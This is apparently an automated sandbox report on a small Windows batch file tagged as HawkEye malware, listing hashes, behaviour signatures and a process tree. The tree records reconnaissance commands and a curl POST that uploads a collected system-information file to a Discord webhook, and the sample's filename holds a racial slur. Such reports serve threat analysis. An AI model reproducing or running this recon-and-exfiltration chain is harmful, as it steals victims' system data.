Analysis

  • max time kernel
    104s
  • max time network
    135s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/04/2025, 14:46

General

  • Target

    niggagimeinfo2.bat

  • Size

    732B

  • MD5

    384c723caa1bbf8441ac299813f3f0b5

  • SHA1

    29aac2285f00328ce71c8ca73a697a132f8fd01c

  • SHA256

    1cfa72217a522be6544157099c5ca2eed7db09b05a0e51dc5e0fa2c20dd3021b

  • SHA512

    b721e012d2e73bb8790c6e18aab38517666bdaca783abcc85777be5f9f23b1ff8154e9307dbc479a9f45787f109eb01bd4b52f572dd0add051e4f4697013a26f

Malware Config

Signatures

  • HawkEye

    HawkEye is a malware kit that has seen continuous development since at least 2013.

  • Hawkeye family
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Collects information from the system 1 TTPs 1 IoCs

    Uses WMIC.exe to find detailed system information.

  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\niggagimeinfo2.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2520
    • C:\Windows\system32\HOSTNAME.EXE
      hostname
      2⤵
        PID:3180
      • C:\Windows\system32\whoami.exe
        whoami
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1316
      • C:\Windows\system32\systeminfo.exe
        systeminfo
        2⤵
        • Gathers system information
        PID:2320
      • C:\Windows\system32\findstr.exe
        findstr /B /C:"OS Name" /C:"OS Version"
        2⤵
          PID:836
        • C:\Windows\system32\ipconfig.exe
          ipconfig
          2⤵
          • Gathers network information
          PID:4788
        • C:\Windows\system32\findstr.exe
          findstr IPv6
          2⤵
            PID:4820
          • C:\Windows\system32\ipconfig.exe
            ipconfig
            2⤵
            • Gathers network information
            PID:4916
          • C:\Windows\system32\findstr.exe
            findstr IPv4
            2⤵
              PID:4940
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic logicaldisk get caption, freespace, size
              2⤵
              • Collects information from the system
              • Suspicious use of AdjustPrivilegeToken
              PID:5604
            • C:\Windows\system32\curl.exe
              curl -X POST https://discord.com/api/webhooks/1356639514516521070/8nlc2VGdJHuRDez5RrzlRRII70A1yJIPtcnWxxs29eiCCPnO9RISRmMRDDKhvSaTzDx8 -H "Content-Type: application/json" -d "{\"content\": \"```\n$(type "C:\Users\Admin\AppData\Local\Temp\sysinfo.txt")\n```\"}"
              2⤵
                PID:5348

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads